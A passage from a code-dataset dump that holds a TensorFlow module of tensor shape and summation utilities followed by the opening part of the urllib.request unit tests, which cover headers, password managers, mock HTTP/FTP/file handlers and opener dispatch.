return True
return False | mit |
zycdragonball/tensorflow | tensorflow/contrib/framework/python/framework/tensor_util.py | 48 | 10771 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tensor utility functions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
__all__ = [
'assert_same_float_dtype',
'assert_scalar',
'assert_scalar_int',
'convert_to_tensor_or_sparse_tensor',
'is_tensor',
'reduce_sum_n',
'remove_squeezable_dimensions',
'with_shape',
'with_same_shape']
# Temporary for backwards compatibility
is_tensor = tensor_util.is_tensor
assert_same_float_dtype = check_ops.assert_same_float_dtype
assert_scalar = check_ops.assert_scalar
convert_to_tensor_or_sparse_tensor = (
sparse_tensor.convert_to_tensor_or_sparse_tensor)
def reduce_sum_n(tensors, name=None):
"""Reduce tensors to a scalar sum.
This reduces each tensor in `tensors` to a scalar via `tf.reduce_sum`, then
adds them via `tf.add_n`.
Args:
tensors: List of tensors, all of the same numeric type.
name: Tensor name, and scope for all other ops.
Returns:
Scalar tensor holding the sum of all `tensors`.
Raises:
ValueError: if `tensors` is missing or empty.
"""
if not tensors:
raise ValueError('No tensors provided.')
with ops.name_scope(name, 'reduce_sum_n', tensors) as name_scope:
tensors = [
math_ops.reduce_sum(t, name='%s/sum' % t.op.name) for t in tensors]
if len(tensors) == 1:
return tensors[0]
return math_ops.add_n(tensors, name=name_scope)
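# Illustrative usage (assumes a, b, c are numeric tensors of the same dtype):
#
#     total = reduce_sum_n([a, b, c])
#     # computes tf.add_n([tf.reduce_sum(a), tf.reduce_sum(b), tf.reduce_sum(c)])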
def remove_squeezable_dimensions(predictions, labels, name=None):
"""Squeeze last dim if ranks of `predictions` and `labels` differ by 1.
This will use static shape if available. Otherwise, it will add graph
operations, which could result in a performance hit.
Args:
predictions: Predicted values, a `Tensor` of arbitrary dimensions.
labels: Label values, a `Tensor` whose dimensions match `predictions`.
name: Name of the op.
Returns:
Tuple of `predictions` and `labels`, possibly with last dim squeezed.
"""
with ops.name_scope(name, 'remove_squeezable_dimensions',
[predictions, labels]):
predictions = ops.convert_to_tensor(predictions)
labels = ops.convert_to_tensor(labels)
predictions_shape = predictions.get_shape()
predictions_rank = predictions_shape.ndims
labels_shape = labels.get_shape()
labels_rank = labels_shape.ndims
if (labels_rank is not None) and (predictions_rank is not None):
# Use static rank.
rank_diff = predictions_rank - labels_rank
if rank_diff == -1:
labels = array_ops.squeeze(labels, [-1])
elif rank_diff == 1:
predictions = array_ops.squeeze(predictions, [-1])
return predictions, labels
# Use dynamic rank.
rank_diff = array_ops.rank(predictions) - array_ops.rank(labels)
if (predictions_rank is None) or (
predictions_shape.dims[-1].is_compatible_with(1)):
predictions = control_flow_ops.cond(
math_ops.equal(1, rank_diff),
lambda: array_ops.squeeze(predictions, [-1]),
lambda: predictions)
if (labels_rank is None) or (
labels_shape.dims[-1].is_compatible_with(1)):
labels = control_flow_ops.cond(
math_ops.equal(-1, rank_diff),
lambda: array_ops.squeeze(labels, [-1]),
lambda: labels)
return predictions, labels
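# Shape-only example: predictions of shape [2, 1] with labels of shape [2]
# differ in rank by 1, so predictions is squeezed to shape [2]; when both
# ranks are static this is resolved at graph construction with no extra ops.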
def _all_equal(tensor0, tensor1):
with ops.name_scope('all_equal', values=[tensor0, tensor1]) as scope:
return math_ops.reduce_all(
math_ops.equal(tensor0, tensor1, name='equal'), name=scope)
def _is_rank(expected_rank, actual_tensor):
"""Returns whether actual_tensor's rank is expected_rank.
Args:
expected_rank: Integer defining the expected rank, or tensor of same.
actual_tensor: Tensor to test.
Returns:
New tensor.
"""
with ops.name_scope('is_rank', values=[actual_tensor]) as scope:
expected = ops.convert_to_tensor(expected_rank, name='expected')
actual = array_ops.rank(actual_tensor, name='actual')
return math_ops.equal(expected, actual, name=scope)
def _is_shape(expected_shape, actual_tensor, actual_shape=None):
"""Returns whether actual_tensor's shape is expected_shape.
Args:
expected_shape: Integer list defining the expected shape, or tensor of same.
actual_tensor: Tensor to test.
actual_shape: Shape of actual_tensor, if we already have it.
Returns:
New tensor.
"""
with ops.name_scope('is_shape', values=[actual_tensor]) as scope:
is_rank = _is_rank(array_ops.size(expected_shape), actual_tensor)
if actual_shape is None:
actual_shape = array_ops.shape(actual_tensor, name='actual')
shape_equal = _all_equal(
ops.convert_to_tensor(expected_shape, name='expected'),
actual_shape)
return math_ops.logical_and(is_rank, shape_equal, name=scope)
def _assert_shape_op(expected_shape, actual_tensor):
"""Asserts actual_tensor's shape is expected_shape.
Args:
expected_shape: List of integers defining the expected shape, or tensor of
same.
actual_tensor: Tensor to test.
Returns:
New assert tensor.
"""
with ops.name_scope('assert_shape', values=[actual_tensor]) as scope:
actual_shape = array_ops.shape(actual_tensor, name='actual')
is_shape = _is_shape(expected_shape, actual_tensor, actual_shape)
return control_flow_ops.Assert(
is_shape, [
'Wrong shape for %s [expected] [actual].' % actual_tensor.name,
expected_shape,
actual_shape
], name=scope)
def with_same_shape(expected_tensor, tensor):
"""Assert tensors are the same shape, from the same graph.
Args:
expected_tensor: Tensor with expected shape.
tensor: Tensor of actual values.
Returns:
Tuple of (actual_tensor, label_tensor), possibly with assert ops added.
"""
with ops.name_scope('%s/' % tensor.op.name, values=[expected_tensor, tensor]):
tensor_shape = expected_tensor.get_shape()
expected_shape = (
tensor_shape.as_list() if tensor_shape.is_fully_defined()
else array_ops.shape(expected_tensor, name='expected_shape'))
return with_shape(expected_shape, tensor)
def with_shape(expected_shape, tensor):
"""Asserts tensor has expected shape.
If tensor shape and expected_shape, are fully defined, assert they match.
Otherwise, add assert op that will validate the shape when tensor is
evaluated, and set shape on tensor.
Args:
expected_shape: Expected shape to assert, as a 1D array of ints, or tensor
of same.
tensor: Tensor whose shape we're validating.
Returns:
tensor, perhaps with a dependent assert operation.
Raises:
ValueError: if tensor has an invalid shape.
"""
if isinstance(tensor, sparse_tensor.SparseTensor):
raise ValueError('SparseTensor not supported.')
# Shape type must be 1D int32.
if tensor_util.is_tensor(expected_shape):
if expected_shape.dtype.base_dtype != dtypes.int32:
raise ValueError(
'Invalid dtype %s for shape %s expected of tensor %s.' % (
expected_shape.dtype, expected_shape, tensor.name))
if isinstance(expected_shape, (list, tuple)):
if not expected_shape:
expected_shape = np.asarray([], dtype=np.int32)
else:
np_expected_shape = np.asarray(expected_shape)
expected_shape = (
np.asarray(expected_shape, dtype=np.int32)
if np_expected_shape.dtype == np.int64 else np_expected_shape)
if isinstance(expected_shape, np.ndarray):
if expected_shape.ndim > 1:
raise ValueError(
'Invalid rank %s for shape %s expected of tensor %s.' % (
expected_shape.ndim, expected_shape, tensor.name))
if expected_shape.dtype != np.int32:
raise ValueError(
'Invalid dtype %s for shape %s expected of tensor %s.' % (
expected_shape.dtype, expected_shape, tensor.name))
actual_shape = tensor.get_shape()
if (not actual_shape.is_fully_defined()
or tensor_util.is_tensor(expected_shape)):
with ops.name_scope('%s/' % tensor.op.name, values=[tensor]):
if (not tensor_util.is_tensor(expected_shape)
and (len(expected_shape) < 1)):
# TODO(irving): Remove scalar special case
return array_ops.reshape(tensor, [])
with ops.control_dependencies([_assert_shape_op(expected_shape, tensor)]):
result = array_ops.identity(tensor)
if not tensor_util.is_tensor(expected_shape):
result.set_shape(expected_shape)
return result
if (not tensor_util.is_tensor(expected_shape) and
not actual_shape.is_compatible_with(expected_shape)):
if (len(expected_shape) < 1) and actual_shape.is_compatible_with([1]):
# TODO(irving): Remove scalar special case.
with ops.name_scope('%s/' % tensor.op.name, values=[tensor]):
return array_ops.reshape(tensor, [])
raise ValueError('Invalid shape for tensor %s, expected %s, got %s.' % (
tensor.name, expected_shape, actual_shape))
return tensor
def assert_scalar_int(tensor, name=None):
"""Assert `tensor` is 0-D, of type `tf.int32` or `tf.int64`.
Args:
tensor: `Tensor` to test.
name: Name of the op and of the new `Tensor` if one is created.
Returns:
`tensor`, for chaining.
Raises:
ValueError: if `tensor` is not 0-D, of integer type.
"""
with ops.name_scope(name, 'assert_scalar_int', [tensor]) as name_scope:
tensor = ops.convert_to_tensor(tensor)
data_type = tensor.dtype
if not data_type.base_dtype.is_integer:
raise ValueError('Expected integer type for %s, received type: %s.'
% (tensor.name, data_type))
return check_ops.assert_scalar(tensor, name=name_scope)
| apache-2.0 |
kmolab/kmolab.github.io | data/Brython-3.3.4/Lib/test/test_urllib2.py | 24 | 61773 | import unittest
from test import support
import os
import io
import socket
import array
import sys
import urllib.request
# The proxy bypass method imported below has logic specific to the OSX
# proxy config data structure but is testable on all platforms.
from urllib.request import Request, OpenerDirector, _proxy_bypass_macosx_sysconf
import urllib.error
# XXX
# Request
# CacheFTPHandler (hard to write)
# parse_keqv_list, parse_http_list, HTTPDigestAuthHandler
class TrivialTests(unittest.TestCase):
def test___all__(self):
# Verify which names are exposed
for module in 'request', 'response', 'parse', 'error', 'robotparser':
context = {}
exec('from urllib.%s import *' % module, context)
del context['__builtins__']
if module == 'request' and os.name == 'nt':
u, p = context.pop('url2pathname'), context.pop('pathname2url')
self.assertEqual(u.__module__, 'nturl2path')
self.assertEqual(p.__module__, 'nturl2path')
for k, v in context.items():
self.assertEqual(v.__module__, 'urllib.%s' % module,
"%r is exposed in 'urllib.%s' but defined in %r" %
(k, module, v.__module__))
def test_trivial(self):
# A couple trivial tests
self.assertRaises(ValueError, urllib.request.urlopen, 'bogus url')
# XXX Name hacking to get this to work on Windows.
fname = os.path.abspath(urllib.request.__file__).replace('\\', '/')
if os.name == 'nt':
file_url = "file:///%s" % fname
else:
file_url = "file://%s" % fname
f = urllib.request.urlopen(file_url)
f.read()
f.close()
def test_parse_http_list(self):
tests = [
('a,b,c', ['a', 'b', 'c']),
('path"o,l"og"i"cal, example', ['path"o,l"og"i"cal', 'example']),
('a, b, "c", "d", "e,f", g, h',
['a', 'b', '"c"', '"d"', '"e,f"', 'g', 'h']),
('a="b\\"c", d="e\\,f", g="h\\\\i"',
['a="b"c"', 'd="e,f"', 'g="h\\i"'])]
for string, list in tests:
self.assertEqual(urllib.request.parse_http_list(string), list)
def test_URLError_reasonstr(self):
err = urllib.error.URLError('reason')
self.assertIn(err.reason, str(err))
class RequestHdrsTests(unittest.TestCase):
def test_request_headers_dict(self):
"""
The Request.headers dictionary is not a documented interface. It
should stay that way, because the complete set of headers are only
accessible through the .get_header(), .has_header(), .header_items()
interface. However, .headers pre-dates those methods, and so real code
will be using the dictionary.
The introduction in 2.4 of those methods was a mistake for the same
reason: code that previously saw all (urllib2 user)-provided headers in
.headers now sees only a subset.
"""
url = "http://example.com"
self.assertEqual(Request(url,
headers={"Spam-eggs": "blah"}
).headers["Spam-eggs"], "blah")
self.assertEqual(Request(url,
headers={"spam-EggS": "blah"}
).headers["Spam-eggs"], "blah")
def test_request_headers_methods(self):
"""
Note the case normalization of header names here, to
.capitalize()-case. This should be preserved for
backwards-compatibility. (In the HTTP case, normalization to
.title()-case is done by urllib2 before sending headers to
http.client).
Note that e.g. r.has_header("spam-EggS") is currently False, and
r.get_header("spam-EggS") returns None, but that could be changed in
future.
Method r.remove_header should remove items both from r.headers and
r.unredirected_hdrs dictionaries
"""
url = "http://example.com"
req = Request(url, headers={"Spam-eggs": "blah"})
self.assertTrue(req.has_header("Spam-eggs"))
self.assertEqual(req.header_items(), [('Spam-eggs', 'blah')])
req.add_header("Foo-Bar", "baz")
self.assertEqual(sorted(req.header_items()),
[('Foo-bar', 'baz'), ('Spam-eggs', 'blah')])
self.assertFalse(req.has_header("Not-there"))
self.assertIsNone(req.get_header("Not-there"))
self.assertEqual(req.get_header("Not-there", "default"), "default")
def test_password_manager(self):
mgr = urllib.request.HTTPPasswordMgr()
add = mgr.add_password
find_user_pass = mgr.find_user_password
add("Some Realm", "http://example.com/", "joe", "password")
add("Some Realm", "http://example.com/ni", "ni", "ni")
add("c", "http://example.com/foo", "foo", "ni")
add("c", "http://example.com/bar", "bar", "nini")
add("b", "http://example.com/", "first", "blah")
add("b", "http://example.com/", "second", "spam")
add("a", "http://example.com", "1", "a")
add("Some Realm", "http://c.example.com:3128", "3", "c")
add("Some Realm", "d.example.com", "4", "d")
add("Some Realm", "e.example.com:3128", "5", "e")
self.assertEqual(find_user_pass("Some Realm", "example.com"),
('joe', 'password'))
#self.assertEqual(find_user_pass("Some Realm", "http://example.com/ni"),
# ('ni', 'ni'))
self.assertEqual(find_user_pass("Some Realm", "http://example.com"),
('joe', 'password'))
self.assertEqual(find_user_pass("Some Realm", "http://example.com/"),
('joe', 'password'))
self.assertEqual(
find_user_pass("Some Realm", "http://example.com/spam"),
('joe', 'password'))
self.assertEqual(
find_user_pass("Some Realm", "http://example.com/spam/spam"),
('joe', 'password'))
self.assertEqual(find_user_pass("c", "http://example.com/foo"),
('foo', 'ni'))
self.assertEqual(find_user_pass("c", "http://example.com/bar"),
('bar', 'nini'))
self.assertEqual(find_user_pass("b", "http://example.com/"),
('second', 'spam'))
# No special relationship between a.example.com and example.com:
self.assertEqual(find_user_pass("a", "http://example.com/"),
('1', 'a'))
self.assertEqual(find_user_pass("a", "http://a.example.com/"),
(None, None))
# Ports:
self.assertEqual(find_user_pass("Some Realm", "c.example.com"),
(None, None))
self.assertEqual(find_user_pass("Some Realm", "c.example.com:3128"),
('3', 'c'))
self.assertEqual(
find_user_pass("Some Realm", "http://c.example.com:3128"),
('3', 'c'))
self.assertEqual(find_user_pass("Some Realm", "d.example.com"),
('4', 'd'))
self.assertEqual(find_user_pass("Some Realm", "e.example.com:3128"),
('5', 'e'))
def test_password_manager_default_port(self):
"""
The point to note here is that we can't guess the default port if
there's no scheme. This applies to both add_password and
find_user_password.
"""
mgr = urllib.request.HTTPPasswordMgr()
add = mgr.add_password
find_user_pass = mgr.find_user_password
add("f", "http://g.example.com:80", "10", "j")
add("g", "http://h.example.com", "11", "k")
add("h", "i.example.com:80", "12", "l")
add("i", "j.example.com", "13", "m")
self.assertEqual(find_user_pass("f", "g.example.com:100"),
(None, None))
self.assertEqual(find_user_pass("f", "g.example.com:80"),
('10', 'j'))
self.assertEqual(find_user_pass("f", "g.example.com"),
(None, None))
self.assertEqual(find_user_pass("f", "http://g.example.com:100"),
(None, None))
self.assertEqual(find_user_pass("f", "http://g.example.com:80"),
('10', 'j'))
self.assertEqual(find_user_pass("f", "http://g.example.com"),
('10', 'j'))
self.assertEqual(find_user_pass("g", "h.example.com"), ('11', 'k'))
self.assertEqual(find_user_pass("g", "h.example.com:80"), ('11', 'k'))
self.assertEqual(find_user_pass("g", "http://h.example.com:80"),
('11', 'k'))
self.assertEqual(find_user_pass("h", "i.example.com"), (None, None))
self.assertEqual(find_user_pass("h", "i.example.com:80"), ('12', 'l'))
self.assertEqual(find_user_pass("h", "http://i.example.com:80"),
('12', 'l'))
self.assertEqual(find_user_pass("i", "j.example.com"), ('13', 'm'))
self.assertEqual(find_user_pass("i", "j.example.com:80"),
(None, None))
self.assertEqual(find_user_pass("i", "http://j.example.com"),
('13', 'm'))
self.assertEqual(find_user_pass("i", "http://j.example.com:80"),
(None, None))
class MockOpener:
addheaders = []
def open(self, req, data=None, timeout=socket._GLOBAL_DEFAULT_TIMEOUT):
self.req, self.data, self.timeout = req, data, timeout
def error(self, proto, *args):
self.proto, self.args = proto, args
class MockFile:
def read(self, count=None): pass
def readline(self, count=None): pass
def close(self): pass
class MockHeaders(dict):
def getheaders(self, name):
return list(self.values())
class MockResponse(io.StringIO):
def __init__(self, code, msg, headers, data, url=None):
io.StringIO.__init__(self, data)
self.code, self.msg, self.headers, self.url = code, msg, headers, url
def info(self):
return self.headers
def geturl(self):
return self.url
class MockCookieJar:
def add_cookie_header(self, request):
self.ach_req = request
def extract_cookies(self, response, request):
self.ec_req, self.ec_r = request, response
class FakeMethod:
def __init__(self, meth_name, action, handle):
self.meth_name = meth_name
self.handle = handle
self.action = action
def __call__(self, *args):
return self.handle(self.meth_name, self.action, *args)
class MockHTTPResponse(io.IOBase):
def __init__(self, fp, msg, status, reason):
self.fp = fp
self.msg = msg
self.status = status
self.reason = reason
self.code = 200
def read(self):
return ''
def info(self):
return {}
def geturl(self):
return self.url
class MockHTTPClass:
def __init__(self):
self.level = 0
self.req_headers = []
self.data = None
self.raise_on_endheaders = False
self._tunnel_headers = {}
def __call__(self, host, timeout=socket._GLOBAL_DEFAULT_TIMEOUT):
self.host = host
self.timeout = timeout
return self
def set_debuglevel(self, level):
self.level = level
def set_tunnel(self, host, port=None, headers=None):
self._tunnel_host = host
self._tunnel_port = port
if headers:
self._tunnel_headers = headers
else:
self._tunnel_headers.clear()
def request(self, method, url, body=None, headers=None):
self.method = method
self.selector = url
if headers is not None:
self.req_headers += headers.items()
self.req_headers.sort()
if body:
self.data = body
if self.raise_on_endheaders:
import socket
raise socket.error()
def getresponse(self):
return MockHTTPResponse(MockFile(), {}, 200, "OK")
def close(self):
pass
class MockHandler:
# useful for testing handler machinery
# see add_ordered_mock_handlers() docstring
handler_order = 500
def __init__(self, methods):
self._define_methods(methods)
def _define_methods(self, methods):
for spec in methods:
if len(spec) == 2: name, action = spec
else: name, action = spec, None
meth = FakeMethod(name, action, self.handle)
setattr(self.__class__, name, meth)
def handle(self, fn_name, action, *args, **kwds):
self.parent.calls.append((self, fn_name, args, kwds))
if action is None:
return None
elif action == "return self":
return self
elif action == "return response":
res = MockResponse(200, "OK", {}, "")
return res
elif action == "return request":
return Request("http://blah/")
elif action.startswith("error"):
code = action[action.rfind(" ")+1:]
try:
code = int(code)
except ValueError:
pass
res = MockResponse(200, "OK", {}, "")
return self.parent.error("http", args[0], res, code, "", {})
elif action == "raise":
raise urllib.error.URLError("blah")
assert False
def close(self): pass
def add_parent(self, parent):
self.parent = parent
self.parent.calls = []
def __lt__(self, other):
if not hasattr(other, "handler_order"):
# No handler_order, leave in original order. Yuck.
return True
return self.handler_order < other.handler_order
def add_ordered_mock_handlers(opener, meth_spec):
"""Create MockHandlers and add them to an OpenerDirector.
meth_spec: list of lists of tuples and strings defining methods to define
on handlers. eg:
[["http_error", "ftp_open"], ["http_open"]]
defines methods .http_error() and .ftp_open() on one handler, and
.http_open() on another. These methods just record their arguments and
return None. Using a tuple instead of a string causes the method to
perform some action (see MockHandler.handle()), eg:
[["http_error"], [("http_open", "return request")]]
defines .http_error() on one handler (which simply returns None), and
.http_open() on another handler, which returns a Request object.
"""
handlers = []
count = 0
for meths in meth_spec:
class MockHandlerSubclass(MockHandler): pass
h = MockHandlerSubclass(meths)
h.handler_order += count
h.add_parent(opener)
count = count + 1
handlers.append(h)
opener.add_handler(h)
return handlers
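# Hedged usage sketch mirroring the docstring's example (illustrative only,
# not part of the original test module):
def _demo_add_ordered_mock_handlers():
    o = OpenerDirector()
    meth_spec = [["http_error"], [("http_open", "return request")]]
    handlers = add_ordered_mock_handlers(o, meth_spec)
    # handlers[0].http_error(...) records the call and returns None;
    # handlers[1].http_open(...) records the call and returns a Request.
    return handlers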
def build_test_opener(*handler_instances):
opener = OpenerDirector()
for h in handler_instances:
opener.add_handler(h)
return opener
class MockHTTPHandler(urllib.request.BaseHandler):
# useful for testing redirections and auth
# sends supplied headers and code as first response
# sends 200 OK as second response
def __init__(self, code, headers):
self.code = code
self.headers = headers
self.reset()
def reset(self):
self._count = 0
self.requests = []
def http_open(self, req):
import email, http.client, copy
self.requests.append(copy.deepcopy(req))
if self._count == 0:
self._count = self._count + 1
name = http.client.responses[self.code]
msg = email.message_from_string(self.headers)
return self.parent.error(
"http", req, MockFile(), self.code, name, msg)
else:
self.req = req
msg = email.message_from_string("\r\n\r\n")
return MockResponse(200, "OK", msg, "", req.get_full_url())
class MockHTTPSHandler(urllib.request.AbstractHTTPHandler):
# Useful for testing the Proxy-Authorization request by verifying the
    # properties of httpconn
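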
def __init__(self):
urllib.request.AbstractHTTPHandler.__init__(self)
self.httpconn = MockHTTPClass()
def https_open(self, req):
return self.do_open(self.httpconn, req)
class MockPasswordManager:
def add_password(self, realm, uri, user, password):
self.realm = realm
self.url = uri
self.user = user
self.password = password
def find_user_password(self, realm, authuri):
self.target_realm = realm
self.target_url = authuri
return self.user, self.password
class OpenerDirectorTests(unittest.TestCase):
def test_add_non_handler(self):
class NonHandler(object):
pass
self.assertRaises(TypeError,
OpenerDirector().add_handler, NonHandler())
def test_badly_named_methods(self):
# test work-around for three methods that accidentally follow the
# naming conventions for handler methods
# (*_open() / *_request() / *_response())
# These used to call the accidentally-named methods, causing a
# TypeError in real code; here, returning self from these mock
# methods would either cause no exception, or AttributeError.
from urllib.error import URLError
o = OpenerDirector()
meth_spec = [
[("do_open", "return self"), ("proxy_open", "return self")],
[("redirect_request", "return self")],
]
add_ordered_mock_handlers(o, meth_spec)
o.add_handler(urllib.request.UnknownHandler())
for scheme in "do", "proxy", "redirect":
self.assertRaises(URLError, o.open, scheme+"://example.com/")
def test_handled(self):
# handler returning non-None means no more handlers will be called
o = OpenerDirector()
meth_spec = [
["http_open", "ftp_open", "http_error_302"],
["ftp_open"],
[("http_open", "return self")],
[("http_open", "return self")],
]
handlers = add_ordered_mock_handlers(o, meth_spec)
req = Request("http://example.com/")
r = o.open(req)
# Second .http_open() gets called, third doesn't, since second returned
# non-None. Handlers without .http_open() never get any methods called
# on them.
# In fact, second mock handler defining .http_open() returns self
# (instead of response), which becomes the OpenerDirector's return
# value.
self.assertEqual(r, handlers[2])
calls = [(handlers[0], "http_open"), (handlers[2], "http_open")]
for expected, got in zip(calls, o.calls):
handler, name, args, kwds = got
self.assertEqual((handler, name), expected)
self.assertEqual(args, (req,))
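# Hedged sketch (illustrative, not part of the original tests) of the
# dispatch rule asserted above: the director walks handlers in
# handler_order and the first non-None return from <proto>_open
# short-circuits the chain.
def _demo_first_non_none_wins():
    o = OpenerDirector()
    handlers = add_ordered_mock_handlers(
        o, [["http_open"],
            [("http_open", "return self")],
            [("http_open", "return self")]])
    r = o.open(Request("http://example.com/"))
    assert r is handlers[1]  # second handler answered; third never ran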
def test_handler_order(self):
o = OpenerDirector()
handlers = []
for meths, handler_order in [
([("http_open", "return self")], 500),
(["http_open"], 0),
]:
class MockHandlerSubclass(MockHandler): pass
h = MockHandlerSubclass(meths)
h.handler_order = handler_order
handlers.append(h)
o.add_handler(h)
o.open("http://example.com/")
# handlers called in reverse order, thanks to their sort order
self.assertEqual(o.calls[0][0], handlers[1])
self.assertEqual(o.calls[1][0], handlers[0])
def test_raise(self):
# raising URLError stops processing of request
o = OpenerDirector()
meth_spec = [
[("http_open", "raise")],
[("http_open", "return self")],
]
handlers = add_ordered_mock_handlers(o, meth_spec)
req = Request("http://example.com/")
self.assertRaises(urllib.error.URLError, o.open, req)
self.assertEqual(o.calls, [(handlers[0], "http_open", (req,), {})])
def test_http_error(self):
# XXX http_error_default
# http errors are a special case
o = OpenerDirector()
meth_spec = [
[("http_open", "error 302")],
[("http_error_400", "raise"), "http_open"],
[("http_error_302", "return response"), "http_error_303",
"http_error"],
[("http_error_302")],
]
handlers = add_ordered_mock_handlers(o, meth_spec)
class Unknown:
def __eq__(self, other): return True
req = Request("http://example.com/")
o.open(req)
assert len(o.calls) == 2
calls = [(handlers[0], "http_open", (req,)),
(handlers[2], "http_error_302",
(req, Unknown(), 302, "", {}))]
for expected, got in zip(calls, o.calls):
handler, method_name, args = expected
self.assertEqual((handler, method_name), got[:2])
self.assertEqual(args, got[2])
def test_processors(self):
# *_request / *_response methods get called appropriately
o = OpenerDirector()
meth_spec = [
[("http_request", "return request"),
("http_response", "return response")],
[("http_request", "return request"),
("http_response", "return response")],
]
handlers = add_ordered_mock_handlers(o, meth_spec)
req = Request("http://example.com/")
o.open(req)
# processor methods are called on *all* handlers that define them,
# not just the first handler that handles the request
calls = [
(handlers[0], "http_request"), (handlers[1], "http_request"),
(handlers[0], "http_response"), (handlers[1], "http_response")]
for i, (handler, name, args, kwds) in enumerate(o.calls):
if i < 2:
# *_request
self.assertEqual((handler, name), calls[i])
self.assertEqual(len(args), 1)
self.assertIsInstance(args[0], Request)
else:
# *_response
self.assertEqual((handler, name), calls[i])
self.assertEqual(len(args), 2)
self.assertIsInstance(args[0], Request)
# response from opener.open is None, because there's no
# handler that defines http_open to handle it
self.assertTrue(args[1] is None or
isinstance(args[1], MockResponse))
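# Hedged restatement (illustrative) of the processor contract checked
# above: unlike <proto>_open, the <proto>_request / <proto>_response
# methods run on every handler that defines them -- request processors
# before the open call, response processors after it.
def _demo_processor_chain():
    o = OpenerDirector()
    add_ordered_mock_handlers(o, [[("http_request", "return request"),
                                   ("http_response", "return response")]])
    o.open(Request("http://example.com/"))
    assert [c[1] for c in o.calls] == ["http_request", "http_response"]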
def test_method_deprecations(self):
req = Request("http://www.example.com")
with self.assertWarns(DeprecationWarning):
req.add_data("data")
with self.assertWarns(DeprecationWarning):
req.get_data()
with self.assertWarns(DeprecationWarning):
req.has_data()
with self.assertWarns(DeprecationWarning):
req.get_host()
with self.assertWarns(DeprecationWarning):
req.get_selector()
with self.assertWarns(DeprecationWarning):
req.is_unverifiable()
with self.assertWarns(DeprecationWarning):
req.get_origin_req_host()
with self.assertWarns(DeprecationWarning):
req.get_type()
def sanepathname2url(path):
try:
path.encode("utf-8")
except UnicodeEncodeError:
raise unittest.SkipTest("path is not encodable to utf8")
urlpath = urllib.request.pathname2url(path)
if os.name == "nt" and urlpath.startswith("///"):
urlpath = urlpath[2:]
# XXX don't ask me about the mac...
return urlpath
class HandlerTests(unittest.TestCase):
def test_ftp(self):
class MockFTPWrapper:
def __init__(self, data): self.data = data
def retrfile(self, filename, filetype):
self.filename, self.filetype = filename, filetype
return io.StringIO(self.data), len(self.data)
def close(self): pass
class NullFTPHandler(urllib.request.FTPHandler):
def __init__(self, data): self.data = data
def connect_ftp(self, user, passwd, host, port, dirs,
timeout=socket._GLOBAL_DEFAULT_TIMEOUT):
self.user, self.passwd = user, passwd
self.host, self.port = host, port
self.dirs = dirs
self.ftpwrapper = MockFTPWrapper(self.data)
return self.ftpwrapper
import ftplib
data = "rheum rhaponicum"
h = NullFTPHandler(data)
h.parent = MockOpener()
for url, host, port, user, passwd, type_, dirs, filename, mimetype in [
("ftp://localhost/foo/bar/baz.html",
"localhost", ftplib.FTP_PORT, "", "", "I",
["foo", "bar"], "baz.html", "text/html"),
("ftp://parrot@localhost/foo/bar/baz.html",
"localhost", ftplib.FTP_PORT, "parrot", "", "I",
["foo", "bar"], "baz.html", "text/html"),
("ftp://%25parrot@localhost/foo/bar/baz.html",
"localhost", ftplib.FTP_PORT, "%parrot", "", "I",
["foo", "bar"], "baz.html", "text/html"),
("ftp://%2542parrot@localhost/foo/bar/baz.html",
"localhost", ftplib.FTP_PORT, "%42parrot", "", "I",
["foo", "bar"], "baz.html", "text/html"),
("ftp://localhost:80/foo/bar/",
"localhost", 80, "", "", "D",
["foo", "bar"], "", None),
("ftp://localhost/baz.gif;type=a",
"localhost", ftplib.FTP_PORT, "", "", "A",
[], "baz.gif", None), # XXX really this should guess image/gif
]:
req = Request(url)
req.timeout = None
r = h.ftp_open(req)
# ftp authentication not yet implemented by FTPHandler
self.assertEqual(h.user, user)
self.assertEqual(h.passwd, passwd)
self.assertEqual(h.host, socket.gethostbyname(host))
self.assertEqual(h.port, port)
self.assertEqual(h.dirs, dirs)
self.assertEqual(h.ftpwrapper.filename, filename)
self.assertEqual(h.ftpwrapper.filetype, type_)
headers = r.info()
self.assertEqual(headers.get("Content-type"), mimetype)
self.assertEqual(int(headers["Content-length"]), len(data))
def test_file(self):
import email.utils, socket
h = urllib.request.FileHandler()
o = h.parent = MockOpener()
TESTFN = support.TESTFN
urlpath = sanepathname2url(os.path.abspath(TESTFN))
towrite = b"hello, world\n"
urls = [
"file://localhost%s" % urlpath,
"file://%s" % urlpath,
"file://%s%s" % (socket.gethostbyname('localhost'), urlpath),
]
try:
localaddr = socket.gethostbyname(socket.gethostname())
except socket.gaierror:
localaddr = ''
if localaddr:
urls.append("file://%s%s" % (localaddr, urlpath))
for url in urls:
f = open(TESTFN, "wb")
try:
try:
f.write(towrite)
finally:
f.close()
r = h.file_open(Request(url))
try:
data = r.read()
headers = r.info()
respurl = r.geturl()
finally:
r.close()
stats = os.stat(TESTFN)
modified = email.utils.formatdate(stats.st_mtime, usegmt=True)
finally:
os.remove(TESTFN)
self.assertEqual(data, towrite)
self.assertEqual(headers["Content-type"], "text/plain")
self.assertEqual(headers["Content-length"], "13")
self.assertEqual(headers["Last-modified"], modified)
self.assertEqual(respurl, url)
for url in [
"file://localhost:80%s" % urlpath,
"file:///file_does_not_exist.txt",
"file://%s:80%s/%s" % (socket.gethostbyname('localhost'),
os.getcwd(), TESTFN),
"file://somerandomhost.ontheinternet.com%s/%s" %
(os.getcwd(), TESTFN),
]:
try:
f = open(TESTFN, "wb")
try:
f.write(towrite)
finally:
f.close()
self.assertRaises(urllib.error.URLError,
h.file_open, Request(url))
finally:
os.remove(TESTFN)
h = urllib.request.FileHandler()
o = h.parent = MockOpener()
# XXXX why does // mean ftp (and /// mean not ftp!), and where
# is file: scheme specified? I think this is really a bug, and
# what was intended was to distinguish between URLs like:
# file:/blah.txt (a file)
# file://localhost/blah.txt (a file)
# file:///blah.txt (a file)
